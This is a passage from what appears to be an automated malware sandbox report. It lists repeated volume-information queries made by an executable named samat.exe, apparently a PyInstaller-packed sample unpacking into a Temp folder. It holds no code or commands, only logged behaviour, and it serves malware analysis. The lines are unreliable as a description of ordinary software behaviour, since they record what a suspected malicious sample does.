                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
